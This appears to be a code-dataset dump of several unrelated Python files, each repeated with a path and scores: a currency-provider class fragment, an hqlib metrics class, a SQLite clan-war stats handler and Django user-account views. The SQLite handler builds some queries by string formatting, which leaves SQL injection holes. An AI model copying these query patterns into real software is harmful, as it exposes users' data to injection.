list(urlparse(url)) url[4] = urlencode(params) url = urlunparse(url) request = Request(url, headers=headers) # Only urls and only secure connections # Don't fucking install untrusted certs unless you want # a mitm xml bomb on your head # and no I won't install extra dependencies for your stupidity if not re.match(r'^https:\/\/', request.full_url): raise Exception('Invalid request url: {}'.format(request.full_url)) return request @abstractmethod def request_currencies( self, *currencies: str, force: bool = False ) -> CurrencyData: pass class _MockCurrencyProvider(CurrencyProvider): def __init__(self, *args, **kwargs): pass def request_currencies( self, *currencies: str, force: bool ) -> CurrencyData: pass class 
FreeCurrencyProvider(CurrencyProvider): pass class ApiKeyCurrencyProvider(CurrencyProvider): class Decorators(CurrencyProvider.Decorators): @staticmethod def with_valid_api_key(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'ApiKeyCurrencyProvider', *args: Any, **kwargs: Any ): if not self.api_key_valid: self.had_error = True raise CurrencyProviderException('API Key is not valid') return func(self, *args, **kwargs) return _wrapper def __init__(self, api_key: str = '') -> None: super().__init__() self._api_key = api_key @property def api_key_valid(self) -> bool: return isinstance(self._api_key, str) and self._api_key.strip() != '' @property def api_key(self) -> str: return self._api_key @api_key.setter def api_key(self, api_key: str) -> None: self._api_key = api_key
0.755005
0.14436
from typing import Any, Dict, List, Set, Type, Optional, TYPE_CHECKING from hqlib.typing import MetricValue from ..base import DomainObject if TYPE_CHECKING: # pragma: no cover # pylint: disable=unused-import from .metric import Metric from .metric_source import MetricSource class MeasurableObject(DomainObject): """ An object that has measurable characteristics. Base class for products, teams, etc. """ def __init__(self, *args, **kwargs) -> None: self.__metric_sources: Dict = kwargs.pop('metric_sources', dict()) self.__metric_source_ids: Dict['MetricSource', str] = kwargs.pop('metric_source_ids', dict()) self.__metric_options: Dict[Type['Metric'], Dict[str, Any]] = kwargs.pop('metric_options', dict()) super().__init__(*args, **kwargs) def target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('target') def low_target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the low target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('low_target') def technical_debt_target(self, metric_class: Type['Metric']): """ Return whether a score below target is considered to be accepted technical debt. """ return self.__metric_options.get(metric_class, dict()).get('debt_target') def metric_sources(self, metric_source_class: Type['MetricSource']) -> List['MetricSource']: """ Return the metric source instances for the metric source class. """ metric_sources = self.__metric_sources.get(metric_source_class, []) if metric_sources and not isinstance(metric_sources, list): metric_sources = [metric_sources] return metric_sources def metric_source_classes(self) -> List[Type['MetricSource']]: """ Return a set of all metric source classes. """ return list(self.__metric_sources.keys()) def metric_source_id(self, metric_source: 'MetricSource') -> Optional[str]: """ Return the id of this object in the metric source. 
""" return self.__metric_source_ids.get(metric_source) def metric_options(self, metric_class: Type['Metric']) -> Dict[str, Any]: """ Return the options of this object for the metric class. Options can be any information that is needed for the metric. """ return self.__metric_options.get(metric_class, dict()) def metrics_with_options(self) -> Set[Type['Metric']]: """ Return the metrics that have options. """ return set(self.__metric_options.keys())
backend/hqlib/domain/measurement/measurable.py
from typing import Any, Dict, List, Set, Type, Optional, TYPE_CHECKING from hqlib.typing import MetricValue from ..base import DomainObject if TYPE_CHECKING: # pragma: no cover # pylint: disable=unused-import from .metric import Metric from .metric_source import MetricSource class MeasurableObject(DomainObject): """ An object that has measurable characteristics. Base class for products, teams, etc. """ def __init__(self, *args, **kwargs) -> None: self.__metric_sources: Dict = kwargs.pop('metric_sources', dict()) self.__metric_source_ids: Dict['MetricSource', str] = kwargs.pop('metric_source_ids', dict()) self.__metric_options: Dict[Type['Metric'], Dict[str, Any]] = kwargs.pop('metric_options', dict()) super().__init__(*args, **kwargs) def target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('target') def low_target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the low target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('low_target') def technical_debt_target(self, metric_class: Type['Metric']): """ Return whether a score below target is considered to be accepted technical debt. """ return self.__metric_options.get(metric_class, dict()).get('debt_target') def metric_sources(self, metric_source_class: Type['MetricSource']) -> List['MetricSource']: """ Return the metric source instances for the metric source class. """ metric_sources = self.__metric_sources.get(metric_source_class, []) if metric_sources and not isinstance(metric_sources, list): metric_sources = [metric_sources] return metric_sources def metric_source_classes(self) -> List[Type['MetricSource']]: """ Return a set of all metric source classes. """ return list(self.__metric_sources.keys()) def metric_source_id(self, metric_source: 'MetricSource') -> Optional[str]: """ Return the id of this object in the metric source. 
""" return self.__metric_source_ids.get(metric_source) def metric_options(self, metric_class: Type['Metric']) -> Dict[str, Any]: """ Return the options of this object for the metric class. Options can be any information that is needed for the metric. """ return self.__metric_options.get(metric_class, dict()) def metrics_with_options(self) -> Set[Type['Metric']]: """ Return the metrics that have options. """ return set(self.__metric_options.keys())
0.914721
0.201853
import sqlite3 class dbHandler: DB_TABLE_MEMBER = 'members' DB_MEMBER_ID = 'id' DB_MEMBER_TAG = 'tag' DB_MEMBER_NAME = 'name' DB_MEMBER_KEY_STATUS = 'keyStatus' DB_TABLE_BATTLES = 'battles' DB_BATTLES_ID = 'id' DB_BATTLES_KEY_MEMBERID = 'memberId' DB_BATTLES_KEY_MATCH = 'keyMatch' DB_BATTLES_KEY_RESULT = 'keyResult' DB_BATTLES_UTC = 'utcTime' DB_TABLE_CW = 'clanWars' DB_CW_ID = 'id' DB_CW_UTC_START = 'utcStart' DB_CW_UTC_END = 'utcEnd' DB_TABLE_KEY_MATCH = 'keyMatch' DB_MATCH_ID = 'id' DB_MATCH_NAME = 'name' DB_VALUE_MATCH_COLLECTION_DAY = [0, 'Collection Day'] DB_VALUE_MATCH_WAR_DAY = [1, 'War Day'] DB_TABLE_KEY_RESULT = 'keyResult' DB_RESULT_ID = 'id' DB_RESULT_NAME = 'name' DB_VALUE_RESULT_WIN = [0, 'Win'] DB_VALUE_RESULT_DRAW = [1, 'Draw'] DB_VALUE_RESULT_LOSE = [2, 'Lose'] DB_TABLE_KEY_STATUS = 'keyStatus' DB_STATUS_ID = 'id' DB_STATUS_NAME = 'name' DB_VALUE_STATUS_ACTIVE = [0, 'Active'] DB_VALUE_STATUS_INACTIVE = [1, 'Inactive'] def createTableIfNotExist(self): if self.conn.cursor().execute("SELECT COUNT(*) FROM sqlite_master WHERE type = 'table'").fetchone()[0] == 0: c = self.conn.cursor() c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} TEXT, {3} TEXT, {4} INTEGER)'.format(self.DB_TABLE_MEMBER, self.DB_MEMBER_ID, self.DB_MEMBER_TAG, self.DB_MEMBER_NAME, self.DB_MEMBER_KEY_STATUS)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER, {4} INTEGER, {5} INTEGER, UNIQUE({2}, {5}))'.format(self.DB_TABLE_BATTLES, self.DB_BATTLES_ID, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER)'.format(self.DB_TABLE_CW, self.DB_CW_ID, self.DB_CW_UTC_START, self.DB_CW_UTC_END)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, 
{2} TEXT)'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME)) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_COLLECTION_DAY[0], self.DB_VALUE_MATCH_COLLECTION_DAY[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_WAR_DAY[0], self.DB_VALUE_MATCH_WAR_DAY[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_WIN[0], self.DB_VALUE_RESULT_WIN[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_DRAW[0], self.DB_VALUE_RESULT_DRAW[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_LOSE[0], self.DB_VALUE_RESULT_LOSE[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_ACTIVE[0], self.DB_VALUE_STATUS_ACTIVE[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_INACTIVE[0], self.DB_VALUE_STATUS_INACTIVE[1])) self.conn.commit() return True def dbOpen(self): self.conn = sqlite3.connect(self.dbPath) def dbClose(self): self.conn.close() def createMember(self, tag, name, status=DB_VALUE_STATUS_ACTIVE[0]): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}) VALUES (?, ?, ?)".format(self.DB_TABLE_MEMBER, 
self.DB_MEMBER_NAME, self.DB_MEMBER_TAG, self.DB_MEMBER_KEY_STATUS), (name, tag, status)) self.conn.commit() return True def updaterMemberStatus(self, tag, status): c = self.conn.cursor() c.execute("UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, status, self.DB_MEMBER_TAG, tag)) self.conn.commit() def readMember_Tag(self, tag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (tag,)) for row in c: return row def createBattle(self, memberId, match, result, utcTime): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}, {4}) VALUES (?, ?, ?, ?)".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC), (memberId, match, result, utcTime)) self.conn.commit() return True def readBattle(self, memberId, utcTime): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=? AND {2}=?".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_UTC), (memberId, utcTime)) for row in c: return row def getMemberIdFromTag(self, memberTag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (memberTag,)) for row in c: return row[0] if not row == None else None def updaterOtherMemberInactive(self, active_Tag): activeTag_string = '' for tag in active_Tag: activeTag_string = activeTag_string + ",'{0}'".format(tag) activeTag_string = activeTag_string[1:] c = self.conn.cursor() c.execute("SELECT {0} FROM {1} WHERE {2} not IN ({3})".format(self.DB_MEMBER_TAG, self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG, activeTag_string)) for tag in c: self.updaterMemberStatus(tag[0], self.DB_VALUE_STATUS_INACTIVE[0]) def updateMemberList(self, memberList): active_Tag = [] for member in memberList: active_Tag.append(member[self.DB_MEMBER_TAG]) if self.readMember_Tag(member[self.DB_MEMBER_TAG]) == None: 
self.createMember(member[self.DB_MEMBER_TAG], member[self.DB_MEMBER_NAME]) self.updaterOtherMemberInactive(active_Tag) return True def updateMemberBattleLog(self, memberTag, matchType, result, utcTime): memberId = self.getMemberIdFromTag(memberTag) if not memberId == None and self.readBattle(memberId, utcTime) == None: self.createBattle(memberId, matchType, result, utcTime) return True def getActiveClanMemberTag(self): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) tag = [] tag_string = '' for row in c: tag.append(row[0]) tag_string = tag_string + ',' + str(row[1]) return tag_string[1:] def getActiveMemberNumber(self): c = self.conn.cursor() c.execute("SELECT count(*) as count, * from {0} where {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) for row in c: return row[0] def __init__(self, dbPath): self.dbPath = dbPath self.dbOpen() self.createTableIfNotExist()
ClanWarStatsModule/dbHandler.py
import sqlite3 class dbHandler: DB_TABLE_MEMBER = 'members' DB_MEMBER_ID = 'id' DB_MEMBER_TAG = 'tag' DB_MEMBER_NAME = 'name' DB_MEMBER_KEY_STATUS = 'keyStatus' DB_TABLE_BATTLES = 'battles' DB_BATTLES_ID = 'id' DB_BATTLES_KEY_MEMBERID = 'memberId' DB_BATTLES_KEY_MATCH = 'keyMatch' DB_BATTLES_KEY_RESULT = 'keyResult' DB_BATTLES_UTC = 'utcTime' DB_TABLE_CW = 'clanWars' DB_CW_ID = 'id' DB_CW_UTC_START = 'utcStart' DB_CW_UTC_END = 'utcEnd' DB_TABLE_KEY_MATCH = 'keyMatch' DB_MATCH_ID = 'id' DB_MATCH_NAME = 'name' DB_VALUE_MATCH_COLLECTION_DAY = [0, 'Collection Day'] DB_VALUE_MATCH_WAR_DAY = [1, 'War Day'] DB_TABLE_KEY_RESULT = 'keyResult' DB_RESULT_ID = 'id' DB_RESULT_NAME = 'name' DB_VALUE_RESULT_WIN = [0, 'Win'] DB_VALUE_RESULT_DRAW = [1, 'Draw'] DB_VALUE_RESULT_LOSE = [2, 'Lose'] DB_TABLE_KEY_STATUS = 'keyStatus' DB_STATUS_ID = 'id' DB_STATUS_NAME = 'name' DB_VALUE_STATUS_ACTIVE = [0, 'Active'] DB_VALUE_STATUS_INACTIVE = [1, 'Inactive'] def createTableIfNotExist(self): if self.conn.cursor().execute("SELECT COUNT(*) FROM sqlite_master WHERE type = 'table'").fetchone()[0] == 0: c = self.conn.cursor() c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} TEXT, {3} TEXT, {4} INTEGER)'.format(self.DB_TABLE_MEMBER, self.DB_MEMBER_ID, self.DB_MEMBER_TAG, self.DB_MEMBER_NAME, self.DB_MEMBER_KEY_STATUS)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER, {4} INTEGER, {5} INTEGER, UNIQUE({2}, {5}))'.format(self.DB_TABLE_BATTLES, self.DB_BATTLES_ID, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER)'.format(self.DB_TABLE_CW, self.DB_CW_ID, self.DB_CW_UTC_START, self.DB_CW_UTC_END)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, 
{2} TEXT)'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME)) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_COLLECTION_DAY[0], self.DB_VALUE_MATCH_COLLECTION_DAY[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_WAR_DAY[0], self.DB_VALUE_MATCH_WAR_DAY[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_WIN[0], self.DB_VALUE_RESULT_WIN[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_DRAW[0], self.DB_VALUE_RESULT_DRAW[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_LOSE[0], self.DB_VALUE_RESULT_LOSE[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_ACTIVE[0], self.DB_VALUE_STATUS_ACTIVE[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_INACTIVE[0], self.DB_VALUE_STATUS_INACTIVE[1])) self.conn.commit() return True def dbOpen(self): self.conn = sqlite3.connect(self.dbPath) def dbClose(self): self.conn.close() def createMember(self, tag, name, status=DB_VALUE_STATUS_ACTIVE[0]): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}) VALUES (?, ?, ?)".format(self.DB_TABLE_MEMBER, 
self.DB_MEMBER_NAME, self.DB_MEMBER_TAG, self.DB_MEMBER_KEY_STATUS), (name, tag, status)) self.conn.commit() return True def updaterMemberStatus(self, tag, status): c = self.conn.cursor() c.execute("UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, status, self.DB_MEMBER_TAG, tag)) self.conn.commit() def readMember_Tag(self, tag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (tag,)) for row in c: return row def createBattle(self, memberId, match, result, utcTime): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}, {4}) VALUES (?, ?, ?, ?)".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC), (memberId, match, result, utcTime)) self.conn.commit() return True def readBattle(self, memberId, utcTime): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=? AND {2}=?".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_UTC), (memberId, utcTime)) for row in c: return row def getMemberIdFromTag(self, memberTag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (memberTag,)) for row in c: return row[0] if not row == None else None def updaterOtherMemberInactive(self, active_Tag): activeTag_string = '' for tag in active_Tag: activeTag_string = activeTag_string + ",'{0}'".format(tag) activeTag_string = activeTag_string[1:] c = self.conn.cursor() c.execute("SELECT {0} FROM {1} WHERE {2} not IN ({3})".format(self.DB_MEMBER_TAG, self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG, activeTag_string)) for tag in c: self.updaterMemberStatus(tag[0], self.DB_VALUE_STATUS_INACTIVE[0]) def updateMemberList(self, memberList): active_Tag = [] for member in memberList: active_Tag.append(member[self.DB_MEMBER_TAG]) if self.readMember_Tag(member[self.DB_MEMBER_TAG]) == None: 
self.createMember(member[self.DB_MEMBER_TAG], member[self.DB_MEMBER_NAME]) self.updaterOtherMemberInactive(active_Tag) return True def updateMemberBattleLog(self, memberTag, matchType, result, utcTime): memberId = self.getMemberIdFromTag(memberTag) if not memberId == None and self.readBattle(memberId, utcTime) == None: self.createBattle(memberId, matchType, result, utcTime) return True def getActiveClanMemberTag(self): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) tag = [] tag_string = '' for row in c: tag.append(row[0]) tag_string = tag_string + ',' + str(row[1]) return tag_string[1:] def getActiveMemberNumber(self): c = self.conn.cursor() c.execute("SELECT count(*) as count, * from {0} where {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) for row in c: return row[0] def __init__(self, dbPath): self.dbPath = dbPath self.dbOpen() self.createTableIfNotExist()
0.285272
0.050401
from django.shortcuts import render from django.http import HttpResponseRedirect from .models import registration from django.http import HttpResponse from django.shortcuts import redirect import requests # base url database url_root = 'https://search-build.herokuapp.com' def delete(request): """ User delete function. is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method =="POST": url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.delete(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect("/") response.delete_cookie("session_id") return response else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/delete.html") else: return redirect("/users/login/") def login(request): """ User login function. 
sends a password and email to the database for comparison, receives a cookie in return "session_id" Args: request : request, cleaned stores the information about the session Returns: render "users/logout.html" if the user is already with cookies render "users/login.html" if the user is without cookies """ if 'session_id' in request.COOKIES: return render(request, "users/logout.html") else: if request.method == "POST": url = url_root + '/users/login' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') parser = resp.headers['Set-Cookie'] expires = parser[65:94] response.set_cookie('session_id', resp.headers['Set-Cookie'], expires=expires) return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/login.html") def logout(request): """ User logout function. 
is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: response = redirect("/") response.delete_cookie("session_id") return response else: return HttpResponse("err") def new_users(request): """ Сreate new user function sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/new_users.html" Args: request : request, cleaned stores the information about the session """ if request.method == "POST": url = url_root + '/users/new' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/new_users.html", ) def info(request): """ User information function. 
is available to the user only with the correct data cookie value function that provides information about the registered account (own account) takes json json example : { "id": 123456, "first_name": "Random", "last_name": "Valerka", "email": "<EMAIL>", "tel_number": "1-234-56-78", "about": "Some information about this man", "time_reg": "2012.10.1 15:34:41" } Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/info.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return redirect('/users/login/') def update(request): """ User update function. is available to the user only with the correct data cookie value sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/update.html" at get request it requests the same json as in "def info(request)" Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method == "POST": userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.post(url, headers=headers, data=userdata) if (resp.status_code >= 200) and (resp.status_code<=300) : resp = requests.get(url, headers=headers) return render(request, "users/info.html", 
resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/update.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else : return redirect('/users/login/')
users/views.py
from django.shortcuts import render from django.http import HttpResponseRedirect from .models import registration from django.http import HttpResponse from django.shortcuts import redirect import requests # base url database url_root = 'https://search-build.herokuapp.com' def delete(request): """ User delete function. is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method =="POST": url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.delete(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect("/") response.delete_cookie("session_id") return response else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/delete.html") else: return redirect("/users/login/") def login(request): """ User login function. 
sends a password and email to the database for comparison, receives a cookie in return "session_id" Args: request : request, cleaned stores the information about the session Returns: render "users/logout.html" if the user is already with cookies render "users/login.html" if the user is without cookies """ if 'session_id' in request.COOKIES: return render(request, "users/logout.html") else: if request.method == "POST": url = url_root + '/users/login' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') parser = resp.headers['Set-Cookie'] expires = parser[65:94] response.set_cookie('session_id', resp.headers['Set-Cookie'], expires=expires) return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/login.html") def logout(request): """ User logout function. 
is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: response = redirect("/") response.delete_cookie("session_id") return response else: return HttpResponse("err") def new_users(request): """ Сreate new user function sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/new_users.html" Args: request : request, cleaned stores the information about the session """ if request.method == "POST": url = url_root + '/users/new' userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } headers = { 'user-agent': request.META['HTTP_USER_AGENT'], } resp = requests.post(url, data=userdata, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect('/') return response else : object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/new_users.html", ) def info(request): """ User information function. 
is available to the user only with the correct data cookie value function that provides information about the registered account (own account) takes json json example : { "id": 123456, "first_name": "Random", "last_name": "Valerka", "email": "<EMAIL>", "tel_number": "1-234-56-78", "about": "Some information about this man", "time_reg": "2012.10.1 15:34:41" } Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/info.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return redirect('/users/login/') def update(request): """ User update function. is available to the user only with the correct data cookie value sends a password and email to the database fields email, password, first_name, last_name, tel_num, about from the template "users/update.html" at get request it requests the same json as in "def info(request)" Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method == "POST": userdata = { 'email': request.POST.get("email"), 'password': request.POST.get("password"), 'first_name': request.POST.get("first_name"), 'last_name': request.POST.get("last_name"), 'tel_number': request.POST.get("tel_num"), 'about': request.POST.get("about"), } url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.post(url, headers=headers, data=userdata) if 